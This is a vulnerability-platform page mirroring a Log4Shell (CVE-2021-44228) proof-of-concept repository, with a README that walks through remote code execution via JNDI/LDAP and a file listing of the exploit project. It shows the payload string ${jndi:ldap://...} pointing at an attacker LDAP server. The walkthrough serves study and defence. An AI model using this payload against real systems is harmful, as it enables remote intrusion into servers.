漏洞平台

POC详情： f209dcc5e5206025f2505d7ec2a3416adac74114

来源

https://github.com/asd58584388/CVE-2021-44228

关联漏洞

标题： Apache Log4j 代码问题漏洞 (CVE-2021-44228)
描述：Apache Log4j是美国阿帕奇（Apache）基金会的一款基于Java的开源日志记录工具。 Apache Log4J 存在代码问题漏洞，攻击者可设计一个数据请求发送给使用 Apache Log4j工具的服务器，当该请求被打印成日志时就会触发远程代码执行。

描述

CVE-2021-44228 vulnerability study

介绍

# CVE-2021-44228 Analysis

## How does it work?

Below is a detailed process of a remote injection case by exploiting log4shell vulnerability.
First, there are 3 part we need to know:

1. Log4j2 allows for the logging of data using a feature called **message lookup substitution**, where log messages can include data dynamically pulled from various sources. (It supports JNDI Lookup)

2. **JNDI Lookup**: Allows data to be fetched via the Java Naming and Directory Interface (JNDI) API, which can interact with different directory services<p align="center" ><img src="image/JNDI.jpg"></p>

3. **LDAP (Lightweight Directory Access Protocol)**: Used primarily for accessing and managing directory information services over a network.

---

Here is a simple example of Remote Code Execution:

<p align="center" ><img src="image/how.jpg" title="" alt="" data-align="center"></p>

1. Hacker set up both LDAP server (accessed by LDAP protocol, keeping a Java malicious code reference) and HTTP server (the place store malicious code)
   
   1. Set up a HTTP Server in the directory that contain compiled malicious code:<p align="center" ><img src="image/http.jpg" title="" alt="" data-align="center"></p>
   
   2. Set up a LDAP Server that store reference:<p align="center" ><img src="image/ldap.jpg" title="" alt="ldap" data-align="center"></p>

2. Hacker sends malicious Input (${jndi:ldap://LDAPSERVER IP:PORT/code}) to software system that have installed log4j2<p align="center" ><img src="image/software%20server.jpg" title="" alt="" data-align="center"></p>

3. Log4j2 using the lookup feature to send request to LDAP server

4. LDAP server redirect requests to HTTP servers via Java code references stored in LDAP servers

5. HTTP server sends back malicious code to software system, and then software system executes the malicious code.

Malicious Code:<p align="center" ><img src="image/malicious.jpg" title="" alt="" data-align="center"></p>

Execute malicious code succeeded:

<p align="center" ><img src="image/result.jpg" title="" alt="" data-align="center"></p>

---

**IMPORTANT**:

1. It is not we can only use LDAP server to do remote code execution, we can also use other methods (such as RMI) as long as the log4j2 successfully do the message lookup substitution and execute malicious code

2. Different versions of Java can make the exploit process different (here we are using java 1.8u112).

3. It is recommended to use the same version of Java in the malicious code as the software (servers using log4j2) or at most not higher than the Java version of the software.<p align="center" ><img src="image/version.jpg" title="" alt="" data-align="center"></p>

4. The lookup code in Log4j2:<p align="center" ><img src="image/lookup.jpg" title="" alt="" data-align="center"></p>

文件快照


 [4.0K]  /data/pocs/f209dcc5e5206025f2505d7ec2a3416adac74114
├── [4.0K]  http
│   ├── [ 749]  exp.class
│   └── [ 288]  exp.java
├── [4.0K]  image
│   ├── [ 24K]  how.jpg
│   ├── [ 14K]  http.jpg
│   ├── [ 25K]  JNDI.jpg
│   ├── [ 89K]  ldap.jpg
│   ├── [106K]  lookup.jpg
│   ├── [ 40K]  malicious.jpg
│   ├── [ 84K]  result.jpg
│   ├── [ 45K]  software server.jpg
│   └── [ 24K]  version.jpg
├── [1.0K]  LICENSE
├── [4.0K]  marshalsec
│   ├── [1.0K]  LICENSE.txt
│   ├── [ 195]  marshalsec.iml
│   ├── [404K]  marshalsec.pdf
│   ├── [7.2K]  pom.xml
│   ├── [5.5K]  README.md
│   ├── [4.0K]  src
│   │   ├── [4.0K]  main
│   │   │   └── [4.0K]  java
│   │   │       └── [4.0K]  marshalsec
│   │   │           ├── [2.0K]  BlazeDSAMF0.java
│   │   │           ├── [2.9K]  BlazeDSAMF3AM.java
│   │   │           ├── [2.0K]  BlazeDSAMF3.java
│   │   │           ├── [3.0K]  BlazeDSAMFX.java
│   │   │           ├── [6.1K]  BlazeDSBase.java
│   │   │           ├── [1.2K]  BlazeDSExternalizableBase.java
│   │   │           ├── [2.0K]  Burlap.java
│   │   │           ├── [3.8K]  Castor.java
│   │   │           ├── [1.1K]  EscapeType.java
│   │   │           ├── [4.0K]  gadgets
│   │   │           │   ├── [1.4K]  Args.java
│   │   │           │   ├── [1.7K]  BindingEnumeration.java
│   │   │           │   ├── [1.8K]  C3P0RefDataSource.java
│   │   │           │   ├── [3.1K]  C3P0WrapperConnPool.java
│   │   │           │   ├── [1.4K]  ClassFiles.java
│   │   │           │   ├── [1.9K]  CommonsBeanutils.java
│   │   │           │   ├── [3.0K]  CommonsConfiguration.java
│   │   │           │   ├── [1.1K]  Gadget.java
│   │   │           │   ├── [2.3K]  GadgetType.java
│   │   │           │   ├── [2.0K]  Groovy.java
│   │   │           │   ├── [2.9K]  ImageIO.java
│   │   │           │   ├── [1.5K]  JdbcRowSet.java
│   │   │           │   ├── [ 14K]  JDKUtil.java
│   │   │           │   ├── [1.6K]  LazySearchEnumeration.java
│   │   │           │   ├── [3.8K]  MockProxies.java
│   │   │           │   ├── [1.3K]  Primary.java
│   │   │           │   ├── [2.5K]  Resin.java
│   │   │           │   ├── [ 351]  ResourceGadget.java
│   │   │           │   ├── [2.0K]  Rome.java
│   │   │           │   ├── [1.5K]  ScriptEngine.java
│   │   │           │   ├── [1.7K]  ServiceLoader.java
│   │   │           │   ├── [1.6K]  SpringAbstractBeanFactoryPointcutAdvisor.java
│   │   │           │   ├── [1.7K]  SpringPartiallyComparableAdvisorHolder.java
│   │   │           │   ├── [1.9K]  SpringPropertyPathFactory.java
│   │   │           │   ├── [5.8K]  SpringUtil.java
│   │   │           │   ├── [1.3K]  Templates.java
│   │   │           │   ├── [4.3K]  TemplatesUtil.java
│   │   │           │   ├── [3.5K]  ToStringUtil.java
│   │   │           │   ├── [1.8K]  UnicastRefGadget.java
│   │   │           │   ├── [1.7K]  UnicastRemoteObjectGadget.java
│   │   │           │   └── [2.0K]  XBean.java
│   │   │           ├── [2.0K]  Hessian2.java
│   │   │           ├── [4.0K]  HessianBase.java
│   │   │           ├── [2.0K]  Hessian.java
│   │   │           ├── [9.7K]  Jackson.java
│   │   │           ├── [2.6K]  Java.java
│   │   │           ├── [4.0K]  jndi
│   │   │           │   ├── [4.9K]  LDAPRefServer.java
│   │   │           │   └── [ 13K]  RMIRefServer.java
│   │   │           ├── [4.6K]  JsonIO.java
│   │   │           ├── [2.2K]  JYAML.java
│   │   │           ├── [2.8K]  KryoAltStrategy.java
│   │   │           ├── [2.5K]  Kryo.java
│   │   │           ├── [ 11K]  MarshallerBase.java
│   │   │           ├── [1.9K]  Red5AMF0.java
│   │   │           ├── [1.9K]  Red5AMF3.java
│   │   │           ├── [5.5K]  Red5AMFBase.java
│   │   │           ├── [3.6K]  SideEffectSecurityManager.java
│   │   │           ├── [7.5K]  SnakeYAML.java
│   │   │           ├── [2.8K]  TestingSecurityManager.java
│   │   │           ├── [4.0K]  util
│   │   │           │   └── [2.5K]  Reflections.java
│   │   │           ├── [2.0K]  UtilFactory.java
│   │   │           ├── [3.0K]  XStream.java
│   │   │           ├── [6.6K]  YAMLBase.java
│   │   │           └── [2.4K]  YAMLBeans.java
│   │   └── [4.0K]  test
│   │       └── [4.0K]  java
│   │           └── [3.6K]  GadgetsTest.java
│   └── [2.6K]  untitled4-1.0-SNAPSHOT.jar
├── [2.7K]  README.md
└── [4.0K]  target server
    └── [ 616]  HelloLog.java

13 directories, 84 files

神龙机器人已为您缓存

备注

1. 建议优先通过来源进行访问。

2. 如果因为来源失效或无法访问，请发送邮箱到 f.jinxu#gmail.com 索取本地快照（把 # 换成 @）。

3. 神龙已为您对POC代码进行快照，为了长期维护，请考虑为本地POC付费，感谢您的支持。